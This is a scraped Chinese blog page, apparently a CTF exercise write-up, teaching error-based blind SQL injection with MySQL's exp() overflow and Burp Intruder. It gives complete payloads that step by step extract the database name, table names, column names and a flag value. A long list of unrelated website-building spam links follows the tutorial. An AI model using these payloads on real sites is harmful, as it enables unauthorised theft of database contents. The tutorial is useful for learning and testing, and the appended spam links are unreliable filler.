当前位置: 首页 > news >正文

安阳公司做网站甘肃seo网站

安阳公司做网站,甘肃seo网站,工业互联网平台分类,网站开发概述整数范围 最大整数 exp 函数介绍 报错盲注注入 payload分析 709C-ASCII 值就等于我们下面的 7091-1 ,C就是我们要猜的值,当我们猜测的值和ASCII码相等时,那么exp就不会出现报错,因为1-1还是等于709: 练习 id1 an…

整数范围

最大整数

请添加图片描述
请添加图片描述

exp 函数介绍

请添加图片描述

请添加图片描述

报错盲注注入

payload分析

请添加图片描述
709+C-ASCII 值就等于我们下面的 709+1-1 ,C就是我们要猜的值,当我们猜测的值和ASCII码相等时,那么exp就不会出现报错,因为+1-1还是等于709:
请添加图片描述
请添加图片描述

练习

id=1 and 1=1%23    返回hello,admin
id=1' and 1=1%23   返回数据库操作错误

通过上面测试这是一个数字型注入的题目我们直接用下面的payload:

猜测数据库名的长度
id=1 and exp(709%2b4-length(database()))%23

我们看到上面payload里的709%2b4%23是加号的意思这里的意思是709+4,那么为什么要把+号编码呢?因为在burp里+号会被认为是空格,所以需要url编码来编码一下,我们来发包:

请添加图片描述
这里提示数据库操作错误,因为我们这里的猜测是值是4,出现报错说明我们后面的数据库长度没有四位,因为根据我们的exp(709)大于709会报错的特性,那么数据库长度必然小于4,不然的话不会出现报错,这里我们使用burp的爆破模块来猜测长度,在C的位置打上标记:
请添加图片描述
这里我们是从大到小猜的,
请添加图片描述
我们观察发现474为错误信息,4和3之间有个转折点,从原本报错的4变成3后正常了,那么说明我们数据库的长度为3:
请添加图片描述
下面我们开始猜测数据库名:

猜测数据库名
id=1 and exp(709%2b119-ascii(substr((select database()),1,1)))%23

直接在C打上标记:
请添加图片描述
因为exp的特性,所以我们需要从大到小开始猜测,ASCII码的可见范围是32~127,那么我们就从127开始猜测:
在这里插入图片描述
我们找到报错和正常的转折点的数字,119就是我们所需要的正确的ASCII,第二位第三位都是同理:
请添加图片描述

猜表名的长度
id=1 and exp(709%2b9-(select length(group_concat(table_name)) from information_schema.tables where table_schema=database()))%23

猜表名的代码里和上次讲的盲注代码类似,变动的地方是exp函数,我们需要猜测的地方是9的位置,同样爆破9的位置,表名通常不会很大,我们只需要在1~10范围内猜测,大概率就可以拿到长度,其他的payload如下,方法都是类似,用burp标记后爆破就可以得出结果:

测试注入点
id=1 and 1=1%23    返回hello,admin
id=1' and 1=1%23   返回数据库操作错误猜测数据库名的长度
id=1 and exp(709%2b4-length(database()))%23猜测数据库名
id=1 and exp(709%2b119-ascii(substr((select database()),1,1)))%23猜表名
id=1 and exp(709%2b103-ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)))%23猜列名长度
id=1 and exp(709%2b4-(select length(group_concat(column_name)) from information_schema.columns where table_name='flag'))%23猜列名
id=1 and exp(709%2b102-ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),1,1)))%23猜数据长度
id=1 and exp(709%2b38-(select length(flag) from flag))%23猜数据
id=1 and exp(709%2b102-ascii(substr((select flag from flag),1,1)))%23
http://www.yayakq.cn/news/215586/

相关文章:

  • wordpress网站微信支付怎么做网站统计
  • 做ppt需要知道网站大兴建设网站
  • p2c网站方案中国设计师协会
  • 怎么做网站教程 用的工具大众的网站建设
  • 临沂做商城网站网站建设官方网站
  • 天津做网站的哪家好php学校网站建设
  • 合肥智能建站模板上海城市建设官方网站
  • 网站无后台可以上框架房产机构网站建设目标定位
  • 关于服装的网站规划与设计网站备案用英文怎么说
  • 电子商务网站规划的原则是什么做微信公众号的网站
  • 在线网站制作平台app网站下载免费
  • 化妆品营销型网站如何建设专题网站
  • 网站建设投资企业网站首页排版分析
  • 海口建网站网站全新改版如何做
  • sharepoint网站开发温州做网店的网站
  • 无锡市建设招标网站凤凰天机精品资料网
  • 没有域名的网站网络营销推广实战宝典
  • 深圳专业制作网站哪个公司好全球采购
  • 兴华建设集团有限公司网站在网站上上传文件需要怎么做
  • 百度提交入口的使用方法南宁网站seo公司
  • 深圳网站建设的客户在哪里百度搜索使用方法
  • 网站包装推广之网络营销案例广告投放媒体
  • 展示型网站做挂件像网站
  • 网站建设公司专业公司百度旧版本
  • 建网站先要申请网址吗医院网站建设 不足
  • 长丰网站制作企业网站建设前期规划
  • 做好门户网站建设站酷网素材图库免费下载
  • 做网站要准备的需求公司网站维护一般需要做什么
  • 5个常见的电子商务网站wordpress英文主题改成中文版
  • 贵阳公司做网站网站首页设计欣赏